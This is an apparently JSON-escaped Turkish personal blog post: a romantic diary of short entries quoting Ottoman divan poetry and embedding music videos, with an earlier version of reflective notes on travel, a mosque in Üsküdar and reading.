\ud83d\udc40 \n\n_\"Olmad\u0131 ol m\u00e2ha r\u00fb\u015fen yandu\u011fum hicr\u00e2n g\u00fcn\u00fc_ +\n_Yandu\u011fun \u015feb t\u00e2 seher \u015fem'\u00fcn ne bils\u00fcn \u00e2fit\u00e2b_ +\n\n(Ayr\u0131l\u0131k g\u00fcn\u00fc yand\u0131\u011f\u0131mdan o ay gibi g\u00fczel haberd\u00e2r olmad\u0131, yani bu hadise ona ayd\u0131nlanmad\u0131. Mumun gece sabaha kadar yand\u0131\u011f\u0131n\u0131 g\u00fcne\u015f ne bilsin.)\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nKalem olsayd\u0131m efendim eliniz de\u011ferdi, ka\u011f\u0131t olsayd\u0131m efendim y\u00fcz\u00fcn\u00fcz bana d\u00f6nerdi. Heyhat insan olup Yemen'de kalm\u0131\u015f\u0131m. Yemen'deki de yan\u0131n\u0131zdad\u0131r \u00f6yle ya, az kals\u0131n unutup \u00fcz\u00fclecektim. +\n\nSiz yan\u0131mdas\u0131n\u0131z her an her vakit.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00fcn boyunca ka\u00e7 kere demek istedim, yutkundum. Hem bu kadar isteyip hem de bu kadar s\u00f6ylemekten \u00e7ekinmek garip. S\u00f6ylemek istedi\u011fim c\u00fcmleyi zaten biliyorsunuz \ud83d\udc40 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_..._ +\n_yanl\u0131\u015f anla\u015f\u0131lmas\u0131 muhtemel, kald\u0131r\u0131ld\u0131 :) _ +\n_..._\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi ki vars\u0131n\u0131z efendim. Yaz\u0131y\u0131 g\u00f6rd\u00fc\u011f\u00fcn\u00fczde g\u00fcl\u00fcms\u00fcyorumdur size do\u011fru. \ud83d\ude0c\ud83d\ude0c \n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\"Can\u0131m efendim\", ay y\u00fczl\u00fc g\u00fcl y\u00fczl\u00fc efendim... 
\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nThe tulips have bloomed\n\nvideo::vMbjeQl_FdY[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nShall we hear it once more, from another voice 👀 \n\n_Aman aman aman, aaah, come to my side_ +\n_My gazelle-eyed, sweet-tongued one_ +\n_Aaaaah, my crimson dagger_ +\n_Call out to my soul, let my blood flow_ +\n_I am a sacrifice to that soul_ +\n_Aaaaah_\n\nvideo::Y6vbfX0i5Hw[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nvideo::vg8WGEr-dPU[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_O Lord, let me be together with the one I love_ +\n_My heart, my soul, my every moment_\n\nAmen, amen, amen...\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_\"It is always you\"_ 💕 \n\nvideo::VXNISYc8uNI[youtube]\n\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n🌷🌷 \n\nvideo::74R3ku58-t0[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nvideo::jSdJ7gr1-IE[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_\"Gladden me with the sorrow of your pure love_ +\n_Grant me my wish: union with the beloved\"_ \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n\nvideo::fdv_Bki-2aI[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nYou think you are disturbing me; I, for my part, 
tell myself "she values me enough to share her troubles with me," and I am glad. May you never see the face of trouble; and if you should see it -no, no, not if *you* should- if *we* should, I am at your side. To be your partner in sorrow, your confidante, your companion: what great happiness that would be...\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nThis place sat orphaned for a while. \n\nFor whom Abdurrahim Karakoç Bey said it I do not know; but if I say it, who it is for is plain :)\n\n_\"Whenever I hear a word of love_ +\n_It is always you I think of._ +\n_Along boundless daydreams_ +\n_It is always you I think of.\"_\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nHow beautifully Nedim said it...\n\n_\"Since I cannot see your beauty, my love_ +\n_May your image never leave this love-mad heart_ +\n_Since I cannot press my face to the dust at your feet_ +\n_Let me take news of you from the morning wind\"_\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹🌷🌹❤️\n\nvideo::6CmU7vvmVxw[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_My soul is your captive; my heart is your dwelling_\n\nvideo::s2KQlEfbeRI[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nvideo::cDIkxp44qak[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nAnd then there is longing. It seems this feeling will never leave me. 
+\nI miss you so much.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nI have never erased the photograph engraved upon my heart. It is more beautiful than every photograph. +\n\nAnd I say whatever Bekir Bey has said.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_What are you, oh you, o beauty_\n\nvideo::vweKToC3gu0[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_Never send this servant away from your side, o bow-browed one_\n\nvideo::mmbPHRfJsOg[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nHow very beautiful, is it not? +\nBecause She, it turns out, likes it.\n\nvideo::ml0yoRT_e2c[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nThere is a strange sadness in this song, one that takes hold of you and carries you here\n\nvideo::Qprmq3Ol27A[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nHow good that you exist. Because you do, this stranger has found a harbor in this boundless ocean \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nYou are one of a kind, truly one... Let me know that you are beside me, that we dream the same dream, and I will wait. 
💐💐💐 \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nAnd "tsk" to everything 😀 \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nI am dreaming of a home.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nI keep hoping that, God willing, a way will be found. Hope, too, is a kind of prayer. You, I, our families: may no one grieve, may no one be left in hardship :)\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nHow lovely, telling the flowers of you. How lovely, talking about you. \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n🐰🐐 \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nMy body, my soul and my life are in your hands. Use them however you wish. I am my sultana's bondsman. Not in vain; on the contrary, a chance to become worthy of your love.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nWhat a beautiful day it was; what a beautiful memory. A priceless weariness. How much thanks could ever cover it all? For the bliss of seeing your smile, no thanks will suffice. \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nI am still looking at the window of the bus; you are smiling. Your rose face is blooming roses. 
\n\n_\"Ne \u00e7\u00e2re var ki fir\u00e2kunla eglenem bir dem_ +\n_Ne t\u00e2li\u2019\u00fcm meded eyler vis\u00e2le f\u0131rsat olur\"_ +\n(Nef'\u00ee)\n\n_(Ne senin ayr\u0131l\u0131\u011f\u0131n y\u00fcz\u00fcnden bir an oturup kalman\u0131n \u00e7aresi var ne de talihim yard\u0131m eder de sana kavu\u015fma f\u0131rsat\u0131 bulabilirim.)_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBen hala otob\u00fcs\u00fcn cam\u0131n\u0131 g\u00f6zetliyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYarimin kokusunu r\u00fczgar\u0131nda saklayan \u015fehir, senden o kokuyu almaya geldim. Nefes nefes havandan \u00e7ekerek... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSanki iki \u015fehirden ayr\u0131l\u0131yorum. \u0130ki \u00f6zlemi s\u0131\u011fd\u0131raca\u011f\u0131m y\u00fcre\u011fime. \n\nVe hi\u00e7 unutma olur mu, seni seviyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\"H\u0131 h\u0131\" \ud83d\udc95 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00fczel, ne g\u00fczel olmu\u015fsun\n\nvideo::z7BFOVzLM8M[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nVarsam Ta\u015fhan'a izini arasam, Ali Pa\u015fa'ya var\u0131p bir yol soluklansam, Behzat boyu ad\u0131mlasam, Ball\u0131ca'ya yol d\u00fc\u015f\u00fcr\u00fcp nefeslensem, \u00c7ekenli'de yolunu g\u00f6zlesem bulur muyum seni sultan\u0131m? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eirin k\u0131z, sana iyi bir e\u015f olman\u0131n hayali -belki de umudu- beni b\u00f6ylesine din\u00e7 tutan.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00c7ok \u00f6zledim seni. 
One feels, it seems, the sharpest longing for the one felt closest.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nvideo::IC-3G7jWEbk[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nWherever you go, my angel, the heart I left in your palms goes there with you.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_\"May God never banish my heart from union with you_ +\n_May He take my soul before He parts me from you\"_\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nDon't be sad, my angel. Don't be sad at all. I take pride merely in knowing you; imagine, then, how I boast of loving you. No one would find it strange or shame me for it; and even if they did, so be it, it matters not at all. If I am to be reproached for loving you, I will call out to my master Kays: \"Thank heavens, they have reproached me too!\" +\n\nDon't you ever be sad; smile, so that roses bloom on your rose face. You, whom I am honored to know: I love you very much. \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_You are here, in my heart_ +\n_My heart will always beat with you_\n\nvideo::zCLJU1z8Cw4[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nMy window opening onto the sky, my light, my radiance. I know: this helpless love of mine is not enough to be worthy of you. However much it may be, it remains that much too little. \n\nAngel who encircles me with her love, my prayer is never to fall short of the aim of being a husband worthy of you. \n\nBeauty whose laughter wakes the buds, my life is forfeit to be a smile upon your face. \n\nWhatever I say, I will have said too little; whatever I have said, it will not have been worthy of you. At least I know this much. \n\nI love you, dearest of my heart. 
*How good that you were born.*\n\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nMy God, thanks be to You. For giving me the chance to know Her, for engraving Her love upon my heart. \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nMy one and only, how much I have missed you\n\nvideo::vd_mkHdZIEQ[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nI love you from the heart, with all my soul 💕 \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nI liked it. Perhaps you will like it too, my dear little soul. \n\nvideo::5GfZahNlEh0[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nBeautiful is whatever She likes. \n\nvideo::9sIN1mlr2f8[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nDearest of my heart, my heart cannot bear your being sad. May your face always smile. It suits you so well. \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nIf peace were an instrument, it could sound nothing but your voice, my angel. 💕 \n\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nvideo::CVHHLh99B3Q[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nShe is my life. I want her always at my side. Never to be apart... 
\n\nHow good that she exists.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nMy scarf is sooooo beautiful 😍 \n\nBecause the one who got it, the one it wraps, is beautiful. \n\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nDrinking water from your glass: an indescribable happiness. Thank you, my angel, for every moment.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nThe peace and happiness of being at your side are like nothing else. If only I could always be at your side. Ah, if only. \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_Loving only you is not too much_\n\nvideo::303967019[vimeo]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nLooking back, I give thanks for every moment that passed with you. Not only for the hours you were at my side (and I at yours). Every hour I missed you, thought of you, built daydreams is precious too. In short: for however much time has passed since your love alighted upon my heart, a thousandfold thanks for all of it.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nvideo::9XFXbSJ5Cis[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nI turn and look at the time gone by. There is not one moment of which I could say \"if only it had never been\"; each is precious in its own right. +\nSince the moment I came to love you -he means to say: fell in love with you- how much beauty you have let me live. +\nFor all of it I am grateful to you. To hear your voice, to see your rose face would never even cross my mind; I would console myself with waiting for the full moon. +\nNow, every time my phone rings, it is suddenly the fourteenth night of the moon. +\nYou know how the poet opens his poem: +\n_With you a rain begins, thread by thread_ +\nAnd this rain washes my soul and makes it pure. The rain you bring. 
+\nAnd you know how it goes on in the next line: +\n_A beauty is born into my heart from the poem_ +\nIt is you who ushered beauty into my soul and my heart. This is your work. +\nSometimes I wonder: what have I done with my life until today? +\nI loved you; that much suffices. +\nSee, saying so brings yet another poem to mind. +\n_I loved you and withdrew; I said, the world is only this much_ +\nYou are my world, my princess.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nYou are my \"thank goodness\" +\nThe one I miss without cease +\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nGod willing, soon and with blessing; God willing. +\nAmen. \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nBetter than its standing idle, I say; what do you think, my dear? 😀 \n\nvideo::2DPUAxvd978[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_I am your servant; you are my master_\n\nvideo::W0ggje8Y8Fo[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\n_You are a butterfly, a budding flower_ +\n_A beautiful angel, a darling babe_\n\nvideo::1t_3ik1dx18[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nI have become your devotee 💕 \n\nvideo::7dVnGZ5mgrQ[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nLet this stay right here. It will be needed 😍 \n\nvideo::6pZwYgoL8L8[youtube]\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nI beg you, show the way to one who knows not what to do. Or let us walk this road together. \n\nI love you, with a love beyond Mahru. 
\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nCarrying your sadness in my heart is beautiful too. +\nGod willing, my time far from you will not last long. My breath is failing. Without you I have no worth. Don't let it drag on, all right? Come back again. God will open a blessed way for us, God willing.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nMind you don't go hungry. My thoughts are with you. Take good care of yourself, my most precious. \n\nI nearly forgot: how good that you were born, my angel. \n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nBoarded the plane. 22.21\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nThe plane landed. 00.16\n\n","old_contents":"= Kısa Kısa (2)\n:hp-tags:\n\nOn the journeys I have been making once a week for some time now, I came to notice that every journey reminds me of death, in earnest. These journeys keep bringing back to me the truth that, in daily life, I (we) shake off behind cemetery walls. Every journey, I have only just realized, has in fact been dropping this into my remembrance in some measure. The question \"why\" fastened onto this intuition at once. The first answer that came to mind was this: \"Death, after all, is also a journey. These short journeys are a miniature of that great journey.\" Then I weighed myself again: \"Or is what you feel the fear of being unable to return?\", \"Do you see death, too, as a departure without return, and is it your fondness for the World that calls it to mind?\" I set the two thoughts on the two pans of the scale and, as with children playing on a seesaw, I could not make out which were down and which were up.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nAt the end of these journeys I let myself fall into the lap of a friend. It was none other than the Üsküdar Mihrimah Sultan Mosque, from which I had been away for a few months, in whose courtyard I would lose myself in the scampering of the cats. Each time, I watch her rose-figure from afar and make my way toward her with a little longing and a little joy. 
As night draws its blackest sheet over the sky, I set foot in her courtyard; the two friends begin their converse with the Valide Sultan Mosque. I do not interrupt them; I listen, and beside me the sound of the waters running from the ablution fountain. The sun shows itself, leaving its shyness behind the crimsons. I see another friend, a friend whom staying away could not make distant. Then I say: \"To see a friend is a festival.\"\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nWhat with travel, school and work, a busyness hems me in on all four sides. What wearies me more, I think, is having the tasks and duties ahead occupy my mind. Amid this busyness I kept watching for time to read a certain piece, and somehow it was never granted. When at last I read it, I took a pleasure I would not normally have taken. I suppose the eagerness I bring to reading helps a bond form between me and the book, the text. The same thing shows itself again at moments when I am burdened in spirit and mind, or feel lonely (the times I feel lonely despite having lived alone for years are fewer than my loneliness amid crowds). One hero of the novel touches my shoulder, another holds out a hand, a third smiles. The best example of this is _Nisan'ın 2 Günü_; though plainly and simply told, it was a novel in which I found a place for myself. A few years ago I had come across it in the school library and borrowed it. I remember reading it one winter's day with my back against the radiator. The radiator had become one wall of the trench; I felt my feet touch the trench's other wall. A rifle, its butt at my toes, leaned against my shoulder.\n\n✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿✿\n\nI know a good person, and I say: if only I had known her sooner. And I load that \"if only\" with such feeling and such stress that it cannot bear the weight; it is crushed. A mahrû -her fair manner shines like the moon- is teaching how one becomes bedâyi-âşinâ (bedâyi-şinas): acquainted with beauties. How much of it I can learn, I do not know. Once more: *if only*... 
